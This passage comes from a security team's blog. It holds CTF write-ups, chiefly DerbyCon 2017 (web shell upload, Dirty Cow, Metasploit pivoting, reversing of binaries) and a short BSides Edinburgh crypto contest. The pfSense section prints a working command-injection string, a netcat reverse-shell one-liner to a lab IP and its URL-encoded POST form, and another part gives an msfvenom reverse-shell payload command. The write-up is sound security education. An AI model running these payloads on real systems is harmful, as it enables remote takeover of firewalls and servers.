The injection was within the conversion shown in the third highlight. By providing a command value that breaks out, we should have command injection.

Cool. Time to try and upload a web shell. The following payload was constructed and uploaded.

This created a page that would execute any value passed in the cmd parameter. It should be noted that during a proper penetration test, when exploiting issues like this, predictable name such as test4.php should NOT be used, lest it be located and abused by someone else (we typically generate a multiple GUID name) and, ideally, there should be some built in IP address address restrictions. However, this was a CTF and time was of the essence. Let’s hope no other teams found our obviously named newly created page!

The file had been written. Time to call test4.php and see who we were running as.

As expected, we were running as the web user and had limited privileges. Still, this was enough to clean up some flags. We decided to upgrade our access to the operating system by using a fully interactive shell – obtained using the same attack vector.

Finally, we looked for a privilege escalation. The OS was Ubuntu 15.04 and one Dirty Cow later, we had root access and the last flag from the box.

Webmin

This box had TCP port 80 and 10000 open. Port 80 ran a webserver that hosted a number of downloadable challenges, while port 10000 was what appeared to be Webmin.

Webmin was an inviting target because its version appeared to be vulnerable to a number of publicly available flaws that would suit our objective. However, none of the exploits appeared to be working. We then removed the blinkers and stepped back.

The web server on port 80 leaked the OS in its server banner; none other than North Korea’s RedStar 3.0. Aha – not so long ago @hackerfantastic performed a load of research on RedStar and if memory served, the results were not good for the OS. Sure enough…

A quick bit of due diligence on the exploit and then simply set up a netcat listener, ran the exploit with the appropriate parameters and – oh look – immediate root shell. Flag obtained; fairly low value, and rightfully so. Thanks for the stellar work @hackerfantastic!

Dup Scout

This box ran an application called Dup Scout Enterprise.

It was vulnerable to a remote code execution vulnerability, an exploit for which was easily found on exploit-db.

We discovered that the architecture was 32 bit by logging in with admin:admin and checking the system information page. The only thing we had to do for the exploit to work on the target was change the shellcode provided by the out of the box exploit to suit a 32 bit OS. This can easily be achieved by using msfvenom:

  • msfvenom -p windows/meterpreter/reverse_https LHOST=172.16.70.242 LPORT=443 EXITFUN=none -e x86/alpha_mixed -f python

Before we ran the exploit against the target server, we set up the software locally to check it would all work as intended. We then ran it against the production server and were granted a shell with SYSTEM level access. Nice and easy.

X86-intermediate.binary

To keep some reddit netsecers in the cheap seats happy this year, yes we actually had to open a debugger (and IDA too). We’ll walk you through two of the seven binary challenges presented.

By browsing the 172.30.1.240 web server, we found the following directory containing 7 different binaries. This write up will go through the x86-intermediate one.

By opening it up in IDA and heading straight to the main function, we found the following code graph:

Roughly, this translates as checking if the first parameter passed to the executable is -p. If so, the next argument is stored as the first password. This is then passed to the function CheckPassword1 (not the actual name, this has been renamed in IDA). If this is correct the user is prompted for the second password, which is checked by CheckPassword2. If that second password is correct, then the message “Password 2: good job, you’re done” is displayed to the user. Hopefully, this means collection of the flag too!

By opening the CheckPassword1 function, we immediately saw that an array of chars was being built up. A pointer to the beginning of this array was then passed to _strcmp along with the only argument to this function, which was the password passed as p.

We inspected the values going into the char array and they looked like lower case ASCII characters. Decoding these lead to the value the_pass.

Passing that value to the binary with the p flag, we got the following:

Cool, so time for the second password. Jumping straight to the CheckPassword2 function, we found the following at the beginning of the function. Could it be exactly the same as the last function?

Nope, it was completely different, as the main body of the function shown in the following screenshot illustrates. It looks a bit more complicated than the last one…

Using the excellent compiler tool hosted at https://godbolt.org/ it roughly translates into the following:

The method to generate the solution here was to adapt this code into C# (yes; once again in LinqPad and nowhere as difficult as it sounds), this time to run through each possible character combination and then check if the generated value matched the stored hash.

Running it, we found what we were looking for – @12345!) and confirmed it by passing it into the exe.

In order to get the flag just need to combine the_pass@12345!) which, when submitted, returned us 500 points.

arm-hard.binary

The file arm-hard.binary contained an ELF executable which spelled out a flag by writing successive characters to the R0 register. It did this using a method which resembles Return Oriented Programming (ROP), whereby a list of function addresses is pushed onto the stack, and then as each one returns, it invokes the next one from the list.

ROP is a technique which would more usually be found in shellcode. It was developed as a way to perform stack-based buffer overflow attacks, even if the memory containing the stack is marked as non-executable. The fragments of code executed – known as ‘gadgets’ – are normally chosen opportunistically from whatever happens to be available within the code segment. In this instance there was no need for that, because the binary had been written to contain exactly the code fragments needed, and ROP was merely being used to obfuscate the control flow.

To further obfuscate the behaviour, each of the characters was formed by adding an offset to the value 0x61 (ASCII a). This was done from a base value in register R1 (calculated as 0x5a + 0x07 = 0x61):

For example, here is the gadget for writing a letter n to R0 (calculated as 0x61 + 0x0d = 0x6e):

and here is the gadget for a capital letter B:

The gadget addresses were calculated as offsets too, from a base address held in register R10 and equal to the address of the first gadget ( 0x853c). For example:

Here the address placed in R11 by the first instruction is equal to 0x853c + 0x30 = 0x856c, which as we saw above is the gadget for writing the letter n. The second instruction pushes it onto the stack. By stringing a sequence of these operations together it was possible to spell out a message:

The gadgets referred to above correspond respectively to the letters n, o, c, y, b, r, e and d. Since the return stack operates on the principle of first-in, last-out, they are executed in reverse order and so spell out the word derbycon (part of the flag). To start the process going, the program simply popped the first gadget address off the stack then returned to it:

The full flag, which took the form of an e-mail address, was found by extending this analysis to include all of the gadget addresses pushed onto the stack:

  • BlahBlahBlahBobLobLaw@derbycon.com

NUKELAUNCH & NUKELAUNCHDB

We noticed that a server was running IIS 6 and had WebDav enabled. Experience led us to believe that this combination meant it would likely be vulnerable to CVE-2017-7269. Fortunately for us, there is publically available exploit code included in the Metasploit framework:

The exploit ran as expected and we were able to collect a number of basic flags from this server.

Once we’d collected all of the obvious flags, we began to look at the server in a bit more detail. We ran a simple net view command and identified that the compromised server, NUKELANUCH, could see a server named NUKELAUNCHDB.

A quick port scan from our laptops indicated that this server was live, but had no ports open. However, the server was in scope so there must be a way to access it. We assumed that there was some network segregation in place, so we used the initial server as a pivot point to forward traffic.

Bingo, port 1433 was open on NUKELAUNCHDB, as long as you routed via NUKELAUNCH.

We utilized Metasploit’s built in pivoting functionality to push traffic to NUKELAUNCHDB via NUKELAUNCH. This was set up by simply adding a route, something similar to route add NUKELAUNCHDB 255.255.255.255 10 where 10 was the session number we wished to route through. We then started Metasploit’s socks proxy server. This allowed for us to utilize other tools and push their traffic to NUKELAUNCHDB through proxy chains.

At this stage, we made some educated guesses about the password for the sa account and used CLR-based custom stored procedures (http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/) to gain access to the underlying operating system on NUKELAUNCHDB.

ACMEWEAPONSCO

From the HTTP response headers, we identified this host was running a vulnerable version of Home Web Server.

Some cursory research lead to the following exploit-db page:

It detailed a path traversal attack which could be used to execute binaries on the affected machine. Initial attempts to utilise this flaw to run encoded PowerShell commands were unsuccessful, so we had a look for other exploitation vectors.

The web application had what appeared to be file upload functionality, but it didn’t seem to be fully functional.

There was, however, a note on the page explaining that FTP could still be used for uploads, so that was the next port of call.

Anonymous FTP access was enabled, so we were able to simply log in and upload an executable. At this stage we could upload files to the target system and run binaries. The only thing missing was that we don’t know the full path to the binary that we’d uploaded. Fortunately, there was a text file in the cgi-bin detailing the upload configuration:

The only step remaining was to run the binary we’d uploaded. The following web request did the job and we were granted access to the system.

The flags were scattered around the filesystem and the MSSQL database. One of the flags was found on the user’s desktop in a format that required graphical access, so we enabled RDP to grab that one.

pfSense

This challenge was based on a vulnerability discovered by Scott White (@s4squatch) shortly before DerbyCon 2017. It wasn’t quite a 0day (Scott had reported it to pfSense and it was vaguely mentioned in the patch notes) but there was very limited public information about this at the time of the CTF.

The box presented us with a single TCP port open; 443, offering a HTTPS served website. Visiting the site revealed the login page of an instance of the open source firewall software pfSense.

https://www.cyberciti.biz/media/new/faq/2015/02/pfsense-login-1.jpg

We attempted to guess the password. The typical default username and password is admin:pfsense; however this, along with a few other common admin: combinations, failed to grant us entry.

After a short while, we changed the user to pfsense and tried a password of pfsense, and we were in. The pfsense user provided us with a small number of low value flags.

At first glance, the challenge seemed trivial. pfSense has a page called exec.php that can call system commands and run PHP code. However, we soon realised that the pfsense user held almost no privileges. We only had access to a small number of pages. We could install widgets, view some system information – including version numbers – and upload files via the picture widget. Despite all this, there appeared to be very little in the way of options to get a shell on the box.

We then decided to grab a directory listing of all the pages provided by pfSense. We grabbed a copy of the software and copied all of the page path and names from the file system. Then, using the resulting list in combination with the DirBuster tool for automation, we tried every page to attempt to determine if there was anything else that we did have access to. Two pages returned a HTTP 200 OK status.

  • index.php – We already have this.
  • system_groupmanager.php – Hmm…

Browsing to system_groupmanager.php yielded another slightly higher value flag.

This page is responsible for managing members of groups and the privileges they have; awesome! We realised our user was not a member of the “admin” group, so we made that happen and… nothing. No change to the interface and no ability to access a page like exec.php.

A few hours were burned looking for various vulnerabilities, but to no avail. When looking at the source code, nothing immediately jumped out as vulnerable within the page itself, but then pfSense does make heavy use of includes and we were approaching the review using a pretty manual approach.

With time passing, a Google search for “system_groupmanager.php exploit” was performed and… urgh, why didn’t we do that straight away? Sleep deprivation was probably why.

There was a brief description of the vulnerability and a link to the actual pfSense security advisory notice:

A little more information was revealed, including the discoverer of the issue, who so happened to be sitting at the front on the stage as one of the CTF crew: Scott White from TrustedSec. Heh. This confirmed the likelihood that we were on the right track. However, he had not provided any public proof of concept code and searches did not reveal any authored by anyone else either.

The little information provided in the advisory included this paragraph:

“A command-injection vulnerability exists in auth.inc via system_groupmanager.php.

This allows an authenticated WebGUI user with privileges for system_groupmanager.php to execute commands in the context of the root user.”

With a new file as our target for code review and a target parameter, finding the vulnerability would have been considerably easier, but we can do better than that.

pfSense is an open source project which uses GitHub for their version control. By reviewing the commit history associated with auth.inc we quickly identified the affected lines of code, further simplifying our search for the vulnerability. Even better, the information contained within the footer of the security advisory revealed the patched version of the software (2.3.1), further narrowing the timeline of our search.

Having identified the particular line of code we could then understand the execution pathway:

  1. A numeric user ID is submitted within code contained in /usr/local/www/system_groupmanager.php
  2. This is passed to the local_group_set() function within /etc/inc/auth.inc as a PHP array.
  3. An implode() is performed on the incoming array to turn the array object into a single string object, concatenated using commas.
  4. This is then passed to a function called mwexec() without first undergoing any kind of escaping or filtering, which appears to call a system binary /usr/sbin/pw with the stringified array now part of its arguments.

In order to exploit this vulnerability, we needed to escape the string with a quote and type a suitable command.

Initial attempts made direct to the production box resulted in failure. As the injection was blind and didn’t return information to the webpage, we opted to use the ping command and then monitored incoming traffic using Wireshark to confirm success.

Despite having a good understanding of what was happening under the hood, something was still failing. We stood up a test environment with the same version of the pfSense software (2.2.6) and tried the same command. This lead to the same problem; no command execution. However, as we had administrative access to our own instance, we could view the system logs and the errors being caused.

Somehow, the /sbin/ping or the IP address were being returned as an invalid user id by the pw application, insinuating that the string escape was not being wholly successful and that /usr/bin/pw was in fact treating our command as a command line argument, which was not what we wanted.

Some more playing with quotes and escape sequences followed, before the following string resulted in a successful execution of ping and ICMP packets flooded into our network interfaces.

  • 0';/sbin/ping -c 1 172.16.71.10; /usr/bin/pw groupmod test -g 2003 -M '0

Attempting the same input on the live CTF environment also resulted in success. We had achieved command execution. At the time, no one had rooted the box and there was a need for speed if we wanted to be the winners of the challenge coin offered by @DerbyconCTF on Twitter.

On reflection, we believe this could be made much more succinct with:

  • 0';/sbin/ping -c 1 72.16.71.10;'

We think all of our escaping problems were down to the termination of the command with the appropriate number of quotes but, as previously stated, during the competition we went with the longer version as it just worked.

Next step… how do we get a shell?

pfSense is a cut down version of FreeBSD under the hood. There is no wget, there is no curl. Yes, we could write something into the web directory using cat but instead we opted for a traditional old-school Linux reverse shell one liner. Thank you to @PentestMonkey and his cheat sheet (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet):

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.71.10 12345 >/tmp/f

We fired up a netcat listener on our end and used the above as part of the full parameter:

  • 0'; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.71.10 12345 >/tmp/f;/usr/sbin/pw groupmod test -g 2003 -M '0

Or, when URL encoded and part of the members parameter in the post request:

  • &members=%5B%5D=0'%3brm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+172.16.71.10+12345+>/tmp/f%3b/usr/sbin/pw+groupmod+test+-g+2003+-M+'0

With the attack string worked out, we triggered the exploit by moving a user into a group and hitting save.

Apologies for the quality of the following photographs – blame technical problems!

This caused the code to run, create a reverse connection back to us and allowed us to capture the final flag of the pfSense challenge contained in  /root/flag.txt.

And with that, we obtained 5000 points, along with the first of two TrustedSec challenge coins awarded to our team.

DPRK Strategic Missile Attack Planner

This box presented a text based game over telnet.

We thought that this box was going to be a lot harder than it turned out to be and, after spending a while trying a few things, we made a tactical decision to ignore it. Somewhat frustratingly for us, that was the wrong move and compromising this box turned out to be very achievable.

From the help command, we thought that that it might be Ruby command injection. After chatting with the SwAG team after the end of the CTF, we learned that this was correct and it was a case of finding the correct spot to inject Ruby commands. Props to SwAG and other teams for getting this one, and thanks to the DerbyCon CTF organisers for allowing us to grab some screenshots after the competition had finished in order to share this with you. We’ll share what we know about this box, but wish to make it clear that we failed to root it during the competition.

We were supplied with a help command, which lead us to suspect Ruby command injection was at play. The help command printed out various in game commands as well as public/private functions. A small sample of these were as follows:

  • target=
  • position
  • position=
  • id
  • yield=
  • arm!
  • armed?

The ones that helped us to identify that it was Ruby code behind the scenes were:

  • equal?
  • instance_eval
  • instance_exec

We attempted a few attack vectors manually, but we needed a way to automate things; it was taking too long to manually attempt injection techniques. To do this we generated a custom script using expect. In case you don’t know about expect, the following is taken directly from Wikipedia:

“Expect, an extension to the Tcl scripting language written by Don Libes, is a program to automate interactions with programs that expose a text terminal interface.”

We often have to throw custom scripts together to automate various tasks, so if you’re not familiar with this it’s worth a look. The code we implemented to automate the task was as follows:

We then took all of the commands from the game and ran this through this expect script:

  • cat commands | xargs -I{} ./expect.sh {} | grep "Enter Command:" -A 1

After identifying what we thought was the right sequence within the game, we then tried multiple injection techniques with no success. A sample of these are shown below:

  • cat commands | xargs -I{} ./expect.sh {} print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}&& print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}|| print 1 | grep "Enter Command:" -A 1
  • cat commands | xargs -I{} ./expect.sh {}; print 1 | grep "Enter Command:" -A 1

We also tried pinging us back with exec or system as we didn’t know if the response would be blind or show the results back to the screen:

  • cat commands | xargs -I{} ./expect.sh {} exec(ping 172.16.70.146)

It was not easy to identify the host operating system, so we had to make sure we ran commands that would work on both Windows and Linux. No ports other than telnet were open and you couldn’t even ping the host to find the TTL as there was a firewall blocking all other inbound connections.

In the end, we were not successful.

After discussing this with team SwAG post CTF, they put us out of our misery and let us know what the injection technique was. It was a case of using the eval statement in Ruby followed by a back ticked command, for example:

D’oh! It should also be noted that you couldn’t use spaces in the payload, so if you found the execution point you would have had to get around that restriction, although doing so would be fairly trivial.

Automating re-exploitation

Finally, a quick word about efficiency.

Over the course of the CTF a number of the machines were reset to a known good state at regular intervals because they were crashed by people running unstable exploits that were never going to work *cough*DirtryCow*cough*. This meant access to compromised systems had to be re-obtained on a fairly regular basis.

In an effort to speed up this process, we threw together some quick scripts to automate the exploitation of some of the hosts. An example of one of them is shown below:

It was well worth the small amount of time it took to do this, and by the end of the CTF we had a script that more or less auto-pwned every box we had shell on.

Conclusion

We regularly attend DerbyCon and we firmly believe it to be one of the highest quality and welcoming experiences in the infosec scene. We always come away from it feeling reinvigorated in our professional work (once we’ve got over the exhaustion!) and having made new friends, as well as catching up with old ones. It was great that we were able to come first in the CTF, but that was just the icing on the cake. We’d like to extend a big thank you to the many folks who work tirelessly to put on such a great experience – you know who you are!

#trevorforget

BSides Edinburgh 2017 Crypto Contest Write Up

Recently, at the inaugural BSides Edinburgh, Ben Turner and I made the trek up to Edinburgh to see our colleague Neil Lines present his talk “The Hunt for The Red DA”. I can’t say that I am a massive fan of such early starts (we jumped on the first flight out of Birmingham), but thankfully the organisers made the trip absolutely worth it. The talks that I saw were well presented and had good technical content while the venue was absolutely amazing. I even learnt some stuff about the world of IoT that I wished I didn’t know; cheers Ken.

The conference was very well supported by the sponsors, particularly with the solid training on offer. We even recognised the faces of some of the competition from the CTF at DerbyCon. We’re really looking forward to doing battle again later in the year…

The crypto contest

SecureWorks kindly created a challenge for the BSides Edinburgh 2017 audience; they named it the Crypto Contest. Personally, I think one of the core skills as a good penetration tester is being able to quickly deal with data that are you are unfamiliar with and to have a good set of tools that can parse & process in a flexible way. The contest was a good way to practice some of those skills and demonstrate to my colleagues why pure C# in the world’s best programming tool – LINQPad is better than Powershell 😉 Plus, there were some very cool prizes on hand; our eyes quickly zoned in on the Hak5 Bash Bunny.

Challenge number 1 – Square

Navigating to https://www.secureworks.com/~/media/Files/US/Blogs/bsides%20edi%2017/square.ashx, we got the following wall of text

Now credit for this goes to Ben; after trying some advanced military grade cryptographic techniques such as ROT13, he craned his neck and quickly spotted that this was in fact just rotated text. Yep, I was massively over thinking it too! All we had to do was quickly put together some code that would rotate the text 90 degrees around the origin. Firing up LINQPad, the following solution was created (which of course has been tidied up and comments added).

The following out is produced and the flag is ours:

Sure, we could have put the monitor on its side, but where’s the fun in that?

Challenge 2 – Royale

Opening the page https://www.secureworks.com/~/media/Files/US/Blogs/bsides%20edi%2017/royale.ashx?la=en, you got the following, which was immediately recognisable as Morse code. The instructions stated you need to “Please decode the following message, adding appropriate spacing as needed so the flag is readable.”

Funnily enough, I had never worked with Morse code before, but the first thing I noticed was that thankfully Secureworks had put in spaces between prosigns, which made the code a little easier. The first step was to obtain a Morse code library, one that would translate the symbols to letters. This was pretty easy to find with Google and allowed me to build up a CSV file which looked something like this:

Once again, using LINQPad, the following code split up all the symbols, translate each one and then coverted it all into a string.

This gave us the following result, which is written in the NATO phonetic alphabet.

So, a slight tweak to the code, changing the last line to:

…and the next flag was ours:

Challenge 3 – Royale.txt

For challenge 3, https://www.secureworks.com/~/media/Files/US/Blogs/bsides%20edi%2017/dreams.ashx?la=en, we received the instructions “Decipher the message from this transmission” and then the following:

The first calculation was the size; the 5 lines contained 1200 bits (150 bytes). Assuming bytes was our first mistake; this had us trying to convert to different text forms and every kind of data type that we could think of, without any luck. Being bits, we then tried creating images types, e.g. bitmap and even QR codes (which in fairness didn’t really align to the size). The path then led to 6 bit characters because, well, 1200 divides by that very nicely. In honesty, we should have looked more into that first, but we didn’t as there was a talk we wanted to see (honest :)).

So, we were back inside the vendor area when the following tweet arrived.

Feel it out… hang on… Braille uses 6 bit characters, right? Bingo! Straight to https://en.wikipedia.org/wiki/Six-bit_character_code#Example_of_six-bit_Braille_codes to look at the Braille glyphs:

The 2×3 column structure lined up very nicely with the text in the transmission. Cool, so time to bash some code out. By this stage, you can probably guess what tool was opened up 🙂

The first step was to once again create a dictionary file that would translate the glyphs to ASCII. For this, we borrowed the text from the wiki page and built a csv file translating the positions into a letter. It looked like this:

Next was to write some code that translated those positions into characters. We bashed out the following quickly (it’s not perfect but did the job):

We get the following output; there were a couple of manual corrections that we needed to make to get the flag, but it looked like the Bash Bunny might be ours.

Yeah, it was!

Conclusion

While not a Crypto contest in the strictest sense of the word, it was still a lot of fun and we got some practice with data formats that we don’t normally come across. As I said at the start, this is an important skill. A big thank you to SecureWorks for putting the time in to create this contest – we really enjoyed it and we hope you all enjoyed our write up!

– Rob, Ben & Neil

DerbyCon 2016 CTF Write Up

We’ve just got back to work after spending a fantastic few days in Kentucky for DerbyCon 2016.  As with previous years, there was an awesome CTF event, so we thought it’d be rude not to participate.  This post will provide a walk-through of some of the many interesting challenges.   Read more